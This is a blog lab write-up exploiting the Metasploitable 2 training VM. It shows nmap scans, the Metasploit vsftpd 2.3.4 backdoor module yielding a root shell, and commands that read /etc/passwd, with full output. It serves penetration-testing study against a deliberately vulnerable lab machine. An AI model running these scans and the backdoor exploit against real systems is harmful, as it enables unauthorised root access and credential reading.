Metasploitable 2 FTP Exploitation (vsftpd backdoor) SESSION 1

Metasploitable 2 has been released for a while I didn’t had a chance to use it . so I tried it today and I thought of writing  what I’m trying on metaploitable on the blog .

so I started with a simple PING nmap scan on the internal network to see what are the hosts which is running at the moment


Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-04 08:47 EST
Nmap scan report for 192.168.1.1
Host is up (0.00093s latency).
MAC Address: D8:6H:4C:EA:BB:B1 (Tp-link Technologies Co.)
Nmap scan report for 192.168.1.100
Host is up.
Nmap scan report for 192.168.1.101
Host is up (0.00022s latency).
MAC Address: 00:64:BE:8M:YD:12 (Sony)
Nmap scan report for 192.168.1.102
Host is up (0.0010s latency).
MAC Address: 08:00:27:A2:76:F2 (Cadmus Computer Systems)
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.48 seconds


I know 192.168.1.102 is the meatsploitble virtual machine so my next step is to do a ACK scan check if any Firewalls are running

root@bt:~# nmap -sA 192.168.1.102

Starting Nmap 6.01 ( http://nmap.org ) at 2013-03-04 08:48 EST
Nmap scan report for 192.168.1.102
Host is up (0.00057s latency).
All 1000 scanned ports on 192.168.1.102 are unfiltered
MAC Address: 08:00:27:A2:76:F2 (Cadmus Computer Systems)

since it return all posts are unfiltered I guess no firewall is enabled in the system . lets run a nmap scan to get the ports and running services on the target

 

 

root@bt:~# nmap -v -A 192.168.1.102

....
Not shown: 977 closed ports
PORT     STATE SERVICE              VERSION
21/tcp   open  ftp                  vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh                  OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp   open  telnet               Linux telnetd
....

now its a huge list to process trough but here I’m just focusing on what I’m exploiting so I’ll just start with the FTP which is the first result of the open ports. Its running “vsftpd 2.3.4” server . after googling the version and the ftp server I found the backdoor exploit for vsftpd here Backdoor VSFTPD

Ok now it’s time do some metasploit work .



msf > search vsftpd
[-] Warning: database not connected or cache not built, falling back to slow search

Matching Modules
================

   Name                                  Disclosure Date  Rank       Description
   ----                                  ---------------  ----       -----------
   exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution


msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf  exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(vsftpd_234_backdoor) > set RHOST 192.168.1.102
RHOST => 192.168.1.102
msf  exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.102    yes       The target address
   RPORT  21               yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf  exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)
[*] USER: 331 Please specify the password.
[+] Backdoor service has been spawned, handling...
[+] UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (192.168.1.100:60641 -> 192.168.1.102:6200) at 2013-03-04 08:58:29 -0500


whoami
root
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false

exit

so I started metapsploit framework searched for the vsftpd exploit added RHOST and ran the exploit . and that was it, I was blessed with a reverse shell instantly.

I know it’s not much to learn here just a basic vuln identification and an exploit but it’s a start . soo till the next blog post adios amigos

    Resource Links

Metasploitable Info
http://www.offensive-security.com/metasploit-unleashed/Metasploitable
Download Metasploitable
http://information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web
Attacker OS Backtarck
http://www.backtrack-linux.org/downloads/
VSFTPD v2.3.4 Backdoor Command Execution
http://www.metasploit.com/modules/exploit/unix/ftp/vsftpd_234_backdoor

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s